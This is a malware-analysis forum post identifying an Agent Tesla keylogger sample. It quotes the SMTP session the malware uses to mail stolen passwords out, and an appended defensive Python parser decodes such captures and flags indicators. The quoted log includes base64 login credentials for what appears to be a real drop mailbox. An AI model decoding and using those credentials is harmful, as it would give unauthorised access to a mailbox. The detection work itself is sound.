 #30240  by Antelox
 Mon Apr 17, 2017 3:00 pm
ikolor wrote:next ..

https://www.virustotal.com/en/file/dbbc ... 492425361/
This is Agent Tesla keylogger. A sample of the email header sent containing exfiltrated data:
EHLO [redacted]
AUTH login d2VibWFzdGVyQGFtY293ZWxkLmNvbS5teQ==
RWlnaHRpczg4
MAIL FROM:<webmaster@amcoweld.com.my>
RCPT TO:<webmaster@amcoweld.com.my>
DATA
MIME-Version: 1.0
From: webmaster@amcoweld.com.my
To: webmaster@amcoweld.com.my
Date: 17 Apr 2017 20:54:42 +0200
Subject: [redacted] Passwords Recovered From: [redacted] [Agent Tesla]
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable
BR,

Antelox
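As an added example, not part of the post above and not Agent Tesla's own code: a small Python parser for a captured SMTP session of the shape shown above. It recovers the AUTH LOGIN credentials by base64-decoding the client tokens, pulls the envelope and header fields, and flags the traits visible in the post (the "[Agent Tesla]" subject tag, the "Passwords Recovered" subject, sender equal to the sole recipient and to the AUTH user). The session, host name, IP and credentials are constructed placeholders, not the post's values. It goes slightly beyond the post in also handling the server-prompted AUTH LOGIN form and AUTH PLAIN, which the capture does not show.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample, modelled on the exchange quoted in the post.
# Host, IP and credentials are placeholders, not the post's values.
SAMPLE_USER = "user@example.com"
SAMPLE_PASS = "Passw0rd!"
SAMPLE_SESSION = "\r\n".join([
    "220 mail.example.com ESMTP",
    "EHLO [192.0.2.10]",
    "250-mail.example.com",
    "250 AUTH LOGIN PLAIN",
    # AUTH LOGIN with the username as initial response, as in the post
    "AUTH login " + base64.b64encode(SAMPLE_USER.encode()).decode(),
    "334 UGFzc3dvcmQ6",  # server prompt: base64("Password:")
    base64.b64encode(SAMPLE_PASS.encode()).decode(),
    "235 Authentication successful",
    "MAIL FROM:<user@example.com>",
    "250 OK",
    "RCPT TO:<user@example.com>",
    "250 OK",
    "DATA",
    "354 End data with <CR><LF>.<CR><LF>",
    "MIME-Version: 1.0",
    "From: user@example.com",
    "To: user@example.com",
    "Date: 17 Apr 2017 20:54:42 +0200",
    "Subject: WIN-ABC123 Passwords Recovered From: WIN-ABC123 [Agent Tesla]",
    "Content-Type: text/html; charset=us-ascii",
    "Content-Transfer-Encoding: quoted-printable",
    "",
    "<html>stolen credentials would follow here</html>",
    ".",
    "250 OK queued",
])

_STATUS_LINE = re.compile(r"^\d{3}[ -]")   # SMTP server reply
_ADDR = re.compile(r"<([^>]*)>")           # address inside MAIL FROM / RCPT TO


@dataclass
class SmtpExfil:
    helo: Optional[str] = None
    username: Optional[str] = None
    password: Optional[str] = None
    mail_from: Optional[str] = None
    rcpt_to: List[str] = field(default_factory=list)
    headers: Dict[str, str] = field(default_factory=dict)


def b64token(token: str) -> Optional[str]:
    """Decode one SASL base64 token; None if it is not valid base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def _apply_plain(rec: SmtpExfil, blob: Optional[str]) -> None:
    # RFC 4616 AUTH PLAIN: [authzid] NUL authcid NUL passwd in a single token
    if blob is not None and blob.count("\0") == 2:
        _, rec.username, rec.password = blob.split("\0")


def parse_smtp_session(session: str) -> SmtpExfil:
    """Walk the client side of a captured SMTP session and pull out
    credentials, envelope addresses and message headers."""
    rec = SmtpExfil()
    pending = None       # "username", "password" or "plain": what the next client line carries
    in_headers = False   # between DATA and the first blank line
    for raw in session.splitlines():
        line = raw.rstrip("\r")
        if _STATUS_LINE.match(line):
            continue                       # server reply, not client data
        if in_headers:
            if line == "":
                in_headers = False         # end of headers; body not parsed here
                continue
            name, sep, value = line.partition(":")
            if sep:
                rec.headers[name.strip()] = value.strip()
            continue
        if pending:
            decoded = b64token(line)
            if pending == "plain":
                _apply_plain(rec, decoded)
                pending = None
            else:
                if decoded is not None:    # "*" (abort) or garbage decodes to None
                    setattr(rec, pending, decoded)
                pending = "password" if pending == "username" else None
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            rec.helo = arg.strip()
        elif verb == "AUTH":
            mech, _, initial = arg.strip().partition(" ")
            mech = mech.upper()
            if mech == "LOGIN":
                if initial:                # initial response carries the username
                    rec.username = b64token(initial)
                    pending = "password"
                else:                      # server will prompt for both
                    pending = "username"
            elif mech == "PLAIN":
                if initial:
                    _apply_plain(rec, b64token(initial))
                else:
                    pending = "plain"
        elif line.upper().startswith("MAIL FROM:"):
            m = _ADDR.search(line)
            rec.mail_from = m.group(1) if m else line.split(":", 1)[1].strip()
        elif line.upper().startswith("RCPT TO:"):
            m = _ADDR.search(line)
            rec.rcpt_to.append(m.group(1) if m else line.split(":", 1)[1].strip())
        elif verb == "DATA":
            in_headers = True
    return rec


def agent_tesla_indicators(rec: SmtpExfil) -> List[str]:
    """Traits of a parsed session matching the exfiltration mail in the post."""
    hits = []
    subject = rec.headers.get("Subject", "")
    if "[Agent Tesla]" in subject:
        hits.append("subject tagged [Agent Tesla]")
    if "Passwords Recovered" in subject:
        hits.append("subject announces recovered passwords")
    if rec.mail_from and rec.rcpt_to == [rec.mail_from]:
        hits.append("sender and sole recipient are the same mailbox")
    if rec.username and rec.mail_from and rec.username.lower() == rec.mail_from.lower():
        hits.append("SMTP AUTH user equals envelope sender")
    return hits


if __name__ == "__main__":
    r = parse_smtp_session(SAMPLE_SESSION)
    print("helo:", r.helo, "| auth:", r.username, "/", r.password)
    print("from:", r.mail_from, "to:", r.rcpt_to)
    for h in agent_tesla_indicators(r):
        print("indicator:", h)
```

Server replies are skipped by their three-digit status code, so the parser works on a full capture as well as on a client-only transcript like the one in the post. The decoded AUTH LOGIN credentials are the attacker's drop mailbox, which is what an incident responder wants out of such a capture.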